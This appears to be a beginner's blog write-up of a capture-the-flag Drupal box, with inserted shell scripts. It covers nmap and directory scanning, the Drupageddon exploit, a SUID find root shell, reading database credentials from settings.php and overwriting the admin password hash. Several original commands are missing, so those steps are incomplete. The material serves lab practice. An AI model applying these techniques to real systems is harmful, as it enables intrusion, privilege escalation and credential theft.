information_collect

First we need to locate the target machine on the network.

We can do that with a command such as

or

That is how I found it at 192.168.242.129.

Then we need nmap. nmap can scan the machine for open ports, the services behind them, version banners and so on, so it is really useful in the early information-collection step of a pentest, a CTF or any similar exercise.

So we go on.

nmap_scan

Explanation:
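As an added example of what this step produces (not the original post's command or output), here is a scan wrapper plus a small parser that reduces nmap's grepable output to the open ports, which is the list the later steps work from. The target IP is the one found above; the sample output is constructed for the example, not a real scan of the box.

```shell
# Added example, not the original post's scan: -sV fingerprints services,
# -p- covers all TCP ports, -oG - writes nmap's grepable format to stdout.
# Needs nmap and network access, so it is not exercised offline.
scan_target() {
  nmap -sV -p- -oG - "$1"
}

# Reduce grepable output (from stdin) to "port/proto service version", one
# line per open port. The "Ports:" field is a comma-separated list whose
# entries look like  port/state/proto/owner/service/rpc/version/
parse_open_ports() {
  awk -F'\t' '/Ports:/ {
    for (i = 1; i <= NF; i++) {
      if ($i !~ /^Ports: /) continue
      sub(/^Ports: /, "", $i)
      n = split($i, entry, /, /)
      for (j = 1; j <= n; j++) {
        split(entry[j], f, "/")
        if (f[2] != "open") continue
        line = f[1] "/" f[3] " " f[5]
        if (f[7] != "") line = line " " f[7]
        print line
      }
    }
  }'
}

# Constructed sample in the -oG format (not a real scan of 192.168.242.129);
# the fields are tab separated, so it is built with printf.
sample_grepable() {
  printf '# Nmap scan report (constructed sample)\n'
  printf 'Host: 192.168.242.129 ()\tStatus: Up\n'
  printf 'Host: 192.168.242.129 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.0p1 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.22/, 111/open/tcp//rpcbind///, 443/closed/tcp//https///\tIgnored State: closed (65532)\n'
}

open_ports_from_sample() {
  sample_grepable | parse_open_ports
}

# Real use: scan_target 192.168.242.129 | parse_open_ports
```

Closed and filtered ports are dropped, and the version column is left out when nmap could not fingerprint the service, so the output can be fed straight into a follow-up script.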

tips

We can find two things that deserve highlighting:

one is a Drupal site! // a kind of CMS

the other is robots.txt // the file that tells crawlers ("spiders") which paths not to index. It cannot actually ban anyone, so for information collection it is a free list of paths the admin would rather you did not see.

We can fetch it with curl or open it in a web browser.

By the way, I use Firefox (because it is the default on my Kali).

Then, for the purpose of information collection,

we want to know which of those paths we can actually access,

i.e. which ones answer HTTP 200 OK.

Save robots.txt and open it in vim.

tips

Use vim command mode as follows.

command:

:%s/Disallow: /

This command removes the prefix "Disallow: " from every line (the replacement part is empty, so the match is replaced with nothing, not with a space), leaving only the paths. Without the g flag only the first match on each line is replaced, which is fine here because each line has at most one.

For more detail you can see: vim search command
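The same clean-up done non-interactively, as an added example rather than the original post's commands: a small shell script that extracts the paths from a robots.txt, then requests each one and prints its status code so the HTTP 200 ones can be picked out. BASE_URL is an assumption, and the sample robots.txt is constructed for the example (modelled on a Drupal 7 default), not the box's real file.

```shell
# Added example, not the original post's commands. BASE_URL and the sample
# robots.txt below are assumptions; the sample is modelled on Drupal 7's default.
BASE_URL="${BASE_URL:-http://192.168.242.129}"

# Equivalent of the vim :%s/Disallow: / step: keep the path part of every
# Disallow:/Allow: line from stdin, drop CRLF endings, trailing comments,
# empty entries and the bare "/" that is just the site root.
robots_paths() {
  awk -F': *' '
    tolower($1) ~ /^(disallow|allow)$/ {
      path = $2
      sub(/\r$/, "", path)                 # robots.txt often has CRLF endings
      sub(/[[:space:]]*#.*$/, "", path)    # strip trailing comment
      if (path != "" && path != "/") print path
    }' | LC_ALL=C sort -u
}

# Request every path from stdin and print "status path". GET with the body
# discarded rather than HEAD, because some apps answer HEAD differently.
# Needs curl and network access.
check_paths() {
  while IFS= read -r path; do
    code=$(curl -s -o /dev/null -w '%{http_code}' "$BASE_URL$path")
    printf '%s %s\n' "$code" "$path"
  done
}

# Constructed sample (not the box's real file).
sample_robots() {
  printf 'User-agent: *\r\nCrawl-delay: 10\r\n'
  printf '# Directories\r\nDisallow: /includes/\r\nDisallow: /misc/\r\nDisallow: /scripts/\r\n'
  printf 'Allow: /misc/*.css\r\n'
  printf '# Files\r\nDisallow: /CHANGELOG.txt\r\nDisallow: /install.php\r\n'
  printf 'Disallow: /\r\nDisallow: /admin/   # staff only\r\n'
}

paths_from_sample() {
  sample_robots | robots_paths
}

# Real use: curl -s "$BASE_URL/robots.txt" | robots_paths | check_paths | grep '^200 '
```

The list of paths that answer 200 is also a good extra wordlist for the directory brute force in the next step, since it contains names chosen by the site itself rather than a generic dictionary.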

OK, now we can brute-force directories on it.

dir_scan

This command runs a directory brute-force attack against the target

with the wordlist big.txt located in /usr/share/wordlists/dirb.

tips

/usr/share/wordlists is where Kali's official "built-in" wordlists live; the dirb directory inside it is a symlink to /usr/share/dirb/wordlists.

cms_scan

wp_scan

After scanning the directories, I want to know more about the CMS itself: Drupal.

But here I made a mistake: the CMS scanner WPScan is built into Kali,
so I used WPScan in this step.

droopescan

After searching on Google, I found my fault and looked for a Drupal-oriented CMS scanner.

THE DROOPESCANNERRRRRRRR.

I scanned the website again..

tips

A little break for thinking.

So what is most important, or most vulnerable, when hacking a CMS??

1) version

why?

With the version of a CMS you can find a public exploit on the internet, or look it up with a local tool such as searchsploit.

2) themes and plugins

Many careless developers ship unsafe code in them,

and themes and plugins run as part of the web application, with the web server's privileges.

So if you can edit or upload them, you can plant malicious PHP/JS code to get a shell as the web-server user (root still needs a separate privilege escalation, which is what the rest of this post does).

3) vulnerable setting files or profiles

If a privileged configuration file (database credentials, for example) is readable by anonymous or low-privileged users,

it adds more weak points to the system, enables more damage and leads to unpredictable results.

So, following those guides, we can see the version is in the range 7.22-7.26.

to getshell

drupal vulnerability with msf

If we look up this version in Metasploit or searchsploit,

we can get the exploit for it:

Drupageddon! it is! (CVE-2014-3704, a SQL injection in Drupal 7.0 through 7.31, fixed in 7.32; the Metasploit module is exploit/multi/http/drupal_drupageddon.)

Then we get a www-data shell.

get shell!

But the interface (the shell we get) is really bad.

tips

Use a python command to upgrade it to a proper terminal.

get shell

SQL injections Way

Then, looking at my second guide: use the theme/plugin upload in Drupal to install a shell, and use nc to create the backdoor.

We can use msf to create the backdoor PHP files.

the passage here has more detail.

SQL injections unknown way??

Also, if you know how to craft the SQL injection, maybe you can use the SQL to pump your shell out.

But I failed.. if anyone can, I hope he/she can tell me, just send me an email...

tips

Now we have a shell.

We need to ask 3 questions, like a philosopher:

1) who am I?

2) what can I do?

3) where will I go?

whoami: www-data

Use the commands "whoami" / "id" to get the details.

What can I do?

To be sure, we can use the command

as

but in some places, such as our own Kali, this command is not allowed.

Also, if the find/locate commands are usable we get much deeper searching ability,

e.g. we can search for the flags or other useful things during the pentest.

Where will I go?

It is also clear:

RRRRRRROOOOOOOOOOOOOOOOOOOOTTTTTTT!!!

little try:sudo

First we can use sudo (sudo -l) to see which scripts or commands we are allowed to run as root.

NOTHING! It is fucking NOTHING!

try a little bit:suid

then what we can do?

sudo failed, but SUID can work!
You can list all SUID binaries this way,

as follows..

I made a mistake there too.
I thought procmail might be the key,
but actually not;

tips

So how did I get this idea (to use SUID)?

It is one of the TOP 2 easiest ways to get a root shell (the other is sudo).

I recommend one site that lists misconfigurations that let you escalate privileges:

use it as a cheatsheet... have fun~

So you can easily find that the find command is SUID root, and use it to become root.

The command is as follows.

Also an explanation:

there is no direct way (find does not hand you a shell), but a little twisted way: find's -exec runs any command, and because find is SUID root that command runs with root's effective uid.
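The enumeration and the find trick together, as an added example (not the original post's exact commands): list the SUID files, keep the root-owned ones, and spawn a shell through find's -exec. The directory argument and the use of /etc/passwd as a dummy search target are choices made for this example.

```shell
# Added example, not the original post's exact commands. Run it on "/" during
# an engagement; the argument is there so it can be tried on any directory.

# True if the file has the setuid bit.
is_suid() {
  [ -u "$1" ]
}

# All setuid files under a directory (errors from unreadable dirs muted).
list_suid() {
  find "${1:-/}" -type f -perm -4000 2>/dev/null
}

# Only root-owned SUID binaries give you root, so filter to those and show
# owner and mode; compare the result with a checklist of known-abusable ones.
list_suid_root() {
  find "${1:-/}" -type f -perm -4000 -user root -exec ls -l {} \; 2>/dev/null
}

# Proof before the shell: if find is SUID root, the id it runs reports euid=0.
check_find_root() {
  find /etc/passwd -exec id \; -quit
}

# The twist: find never hands out a shell itself, but -exec runs a command
# with find's effective uid, which is 0 when find is SUID root. -quit stops
# after the first match so exactly one shell is spawned. bash needs -p to
# keep euid 0 (it drops it otherwise); newer dash accepts -p too, while old
# dash keeps euid 0 without it, so drop the flag if your sh rejects it.
root_shell_via_find() {
  find /etc/passwd -exec /bin/sh -p \; -quit
}
```

Run check_find_root first: if id does not show euid=0(root), find is not SUID root on that box and the shell trick will not work, whatever the SUID listing looked like.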

another way

We can browse the file system...

like this~

You can see flag1.txt in the web root directory served by www-data.

It tells us to look at the configuration file.

Browse the file system carefully

and you will find settings.php.

It also contains flag2;

it tells us the MySQL database username and password.

So log in to the MySQL database and you can see the admin password (as a hash, not a reversible encryption).

tips

Googling "forgot admin pass of drupal" tells us the Drupal 7 password-hashing method and other ways to get into the Drupal dashboard.

So the methods are: crack the hash, replace it in MySQL with the hash of a password you know (Drupal 7 ships scripts/password-hash.sh to generate one in the right format), or use Drupal Console to reset it.

Doing damage does not matter here, because nobody uses this Drupal but you. :)

The backend has an article by admin; it is a hint.
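The settings.php to MySQL to admin-password steps as one script, added here as an example and not the original post's commands: read the credentials out of the $databases array, query the admin hash, and replace it with a hash Drupal itself generated. The file paths are assumptions for a typical Drupal 7 install, the output format of password-hash.sh ("password: ... hash: ...") is as recalled from the Drupal 7 script, and the sample settings.php with its credentials is constructed for the offline test.

```shell
# Added example, not the original post's commands. The paths are assumptions
# for a typical Drupal 7 install; adjust them to where settings.php really is.
SETTINGS="${SETTINGS:-/var/www/sites/default/settings.php}"
DRUPAL_ROOT="${DRUPAL_ROOT:-/var/www}"

# Print key=value for the connection settings in the $databases array of the
# given settings.php. Drupal writes the values single-quoted, which is what
# this matches.
drupal_db_creds() {
  for key in database username password host; do
    sed -n "s/^[[:space:]]*'$key'[[:space:]]*=>[[:space:]]*'\([^']*\)'.*/$key=\1/p" "$1"
  done
}

# One value, e.g. cred "$SETTINGS" password
cred() {
  drupal_db_creds "$1" | sed -n "s/^$2=//p"
}

# Drupal 7 stores salted, iterated SHA-512 hashes beginning with "$S$", so
# what you read here is something to crack, not an encrypted password.
show_admin_hash() {
  mysql -h "$(cred "$SETTINGS" host)" -u "$(cred "$SETTINGS" username)" \
        -p"$(cred "$SETTINGS" password)" "$(cred "$SETTINGS" database)" \
        -e 'SELECT uid, name, pass FROM users WHERE uid = 1;'
}

# Replace the admin hash with one for a password we choose. The hash comes
# from Drupal's own scripts/password-hash.sh (run from the Drupal root, which
# it bootstraps from the current directory); its output line is assumed to
# look like "password: ... hash: $S$...".
reset_admin_password() {
  new_hash=$(cd "$DRUPAL_ROOT" && php scripts/password-hash.sh "$1" | sed -n 's/.*hash: //p')
  [ -n "$new_hash" ] || { echo "could not generate hash" >&2; return 1; }
  mysql -h "$(cred "$SETTINGS" host)" -u "$(cred "$SETTINGS" username)" \
        -p"$(cred "$SETTINGS" password)" "$(cred "$SETTINGS" database)" \
        -e "UPDATE users SET pass = '$new_hash' WHERE uid = 1;"
}

# Constructed settings.php fragment for offline testing (fake credentials).
make_sample_settings() {
  cat > "$1" <<'EOF'
<?php
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'S3cret-example',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
EOF
}
```

Generating the replacement hash with Drupal's own script avoids guessing the hash format by hand; a wrong prefix or iteration count in the pass column simply locks the account.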

Hmm.. go back to method 1 and use the find command to get a root shell~~;

WIN

now you are root!
WIN!!!!!

————-success————-

Thank you for reading~ I am Esonhugh, and this is my first blog post.